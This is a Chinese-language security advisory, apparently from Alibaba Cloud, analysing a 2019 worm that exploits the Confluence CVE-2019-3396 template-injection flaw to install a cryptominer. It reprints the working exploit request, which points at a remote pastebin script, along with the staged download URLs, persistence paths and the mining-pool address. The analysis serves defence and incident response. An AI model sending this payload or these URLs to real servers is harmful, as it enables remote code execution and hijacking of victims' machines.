蠕虫利用新公开的Confluence RCE漏洞进行大规模攻击,用户应尽快修复

简介: 4月10日下午,阿里云安全监测到一起使用Confluence RCE漏洞(CVE-2019-3396)进行大规模攻击的蠕虫事件,并快速作出响应处理。Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。

简介

4月10日下午,阿里云安全监测到一起使用Confluence RCE漏洞(CVE-2019-3396)进行大规模攻击的蠕虫事件,并快速作出响应处理。

Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。本次遭到利用的漏洞,在Confluence产品官网3月20日的Security Advisory中被最初提及,其Widget Connector存在服务端模板注入漏洞,攻击者能利用此漏洞能够实现目录穿越遍历甚至远程命令执行。

从4月8日国内安全研究员根据patch点写出poc并发布,到4月10日大规模蠕虫攻击爆发,中间只隔了短短两天,再次对云平台及用户的快速响应能力构成严峻考验。

本文将对此次蠕虫事件进行分析,并就如何预防类似事件给出安全建议。

蠕虫传播分析

_

该蠕虫的传播流程如图所示。其手法、程序结构、使用的基础设施,都与先前利用redis攻击的watchdogs蠕虫极度相似,可能是同一作者所为。攻击者首先使用如下payload攻击Confluence服务(CVE-2019-3396):

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host:【victim_host】:【Confluence_port(default 8090)】
Content-Type: application/json; charset=utf-8

{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"https://pastebin.com/raw/KXjybn8M"}}}

该payload导致受害主机运行https://pastebin.com/raw/KXjybn8M中的代码:

_

随后,攻击者将payload中加粗的url部分替换为https://pastebin.com/raw/cHWdCAw2后,再次对同一台主机发送,执行了以下url中存放的内容:

_

以上两条导致受害主机请求并执行https://pastebin.com/raw/wDBa7jCQ

JCQ

综上可知,实际的恶意脚本位置在 https://pastebin.com/raw/xmxHzu5P,判断受害主机架构后,依次尝试使用curl和wget下载恶意程序

_

恶意程序位于http://sowcar.com/t6/696/1554470400x2890174166.jpg,逆向分析发现其与watchdogs挖矿木马升级版使用了类似的反逆向手段,即程序加upx壳后,改掉magic number;手动将LSD改为UPX后,即可解压。

_

解压后程序结构如下图,标红部分为攻击传播的蠕虫模块,标蓝部分为在主机上进行持久化的模块,标黄部分则是挖矿模块。

_

攻击传播的蠕虫模块中,Aago()和Bbgo()进行redis和ssh爆破,Ccgo()则是新添加的Jenkins RCE漏洞(CVE-2019-1003000)利用模块。

持久化模块中,NetdnsWrite()会写入/etc/init.d/netdns文件用于启动恶意程序守护进程;LibWrite()则写入/usr/local/lib/libpamcd.so用于hook各种系统函数;Cron()将下载恶意程序的指令写入cron文件从而定时执行。

挖矿模块会写入/tmp/khugepageds并启动挖矿。

安全建议

1.及时对包括Atlassian Confluence在内的软件和服务进行升级或打补丁。

2.建议使用阿里云安全的下一代云防火墙产品,其阻断恶意外联、能够配置智能策略的功能,能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操作,都需要进行恶意外联;云防火墙的拦截将彻底阻断攻击链。此外,用户还可以通过自定义策略,直接屏蔽恶意网站,达到阻断入侵的目的。

此外,云防火墙独有的虚拟补丁功能,能够帮助客户更灵活、更“无感”地阻断攻击。当前云防火墙已上线虚拟补丁支持防御针对Confluence漏洞的攻击,建议用户在虚拟补丁里手动勾选进行开启,如下图所示。

_jpeg

3.对于有更高定制化要求的用户,可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务,定制适合您的方案,帮助加固系统,预防入侵。入侵事件发生后,也可介入直接协助入侵后的清理、事件溯源等,适合有较高安全需求的用户,或未雇佣安全工程师,但希望保障系统安全的企业。

IOC

矿池:
systemtem.org:51640

恶意程序:

_

Reference

  1. https://jira.atlassian.com/browse/CONFSERVER-57974
  2. https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html
  3. https://paper.seebug.org/884/
  4. https://help.aliyun.com/knowledge_detail/114168.html

本文作者:悟泛

相关文章
|
消息中间件 存储 Java
《RabbitMQ》| 解决消息延迟和堆积问题
本文主要介绍 RabbitMQ的常见问题
1309 1
|
存储 数据安全/隐私保护 网络架构
vue3用户权限管理(导航栏权限控制)2
上一节我们说到,通过后端的用户权限来进行路由的动态添加,实现权限控制,这一节我们通过递归导航栏组件,实现后台权限控制导航栏,接上一节所说我们在vuex中存储了一个路由数组["/","*"]进行权限控制,这一节还是要使用这个路由数组进行导航栏的控制,开始吧。
564 0
fatal error: ft2build.h: 没有那个文件或目录
fatal error: ft2build.h: 没有那个文件或目录
779 0
|
安全 Android开发 数据安全/隐私保护
深入探讨iOS与Android系统安全性对比分析
在移动操作系统领域,iOS和Android无疑是两大巨头。本文从技术角度出发,对这两个系统的架构、安全机制以及用户隐私保护等方面进行了详细的比较分析。通过深入探讨,我们旨在揭示两个系统在安全性方面的差异,并为用户提供一些实用的安全建议。
|
存储 算法
深入解析PID控制算法:从理论到实践的完整指南
前言 大家好,今天我们介绍一下经典控制理论中的PID控制算法,并着重讲解该算法的编码实现,为实现后续的倒立摆样例内容做准备。 众所周知,掌握了 PID ,就相当于进入了控制工程的大门,也能为更高阶的控制理论学习打下基础。 在很多的自动化控制领域。都会遇到PID控制算法,这种算法具有很好的控制模式,可以让系统具有很好的鲁棒性。 基本介绍 PID 深入理解 (1)闭环控制系统:讲解 PID 之前,我们先解释什么是闭环控制系统。简单说就是一个有输入有输出的系统,输入能影响输出。一般情况下,人们也称输出为反馈,因此也叫闭环反馈控制系统。比如恒温水池,输入就是加热功率,输出就是水温度;比如冷库,
2186 15
|
存储 监控 安全
几种确保数据安全的方法:
几种确保数据安全的方法:
946 3
|
SQL 安全 网络安全
GitHub点赞飙升!电信大牛的Python渗透测试实战指南
在网络安全领域,会不会编程,是区分“脚本小子”和真正黑客的关键。实际的渗透测试中会遇到各种复杂的网络环境,常用工具不一定能满足需求,这时就需要对现有工具进行扩展,或者编写符合要求的工具、自动化脚本,这都需要一定的编程能力。在分秒必争的 CTF 竞赛中,想要高效地使用自制脚本工具来达成各种目的,更是需要有编程能力。 Python 这两年越来越火!除了语法简单、开发效率高以外,Python 最大的优势就是拥有超多第三方库。很多有名的网络安全工具和安全系统框架都是用 Python 开发的!所以,掌握 Python 编程已经成为网络安全从业者的必备技能之一。如果你想成为一名合格的安全从业者,就不能只会
|
数据采集 安全 Java
Burpsuite Intruder 暴力破jie实战
Burpsuite Intruder 暴力破jie实战
|
存储 人工智能 安全
AI工具使公司面临数据泄露的风险
AI工具使公司面临数据泄露的风险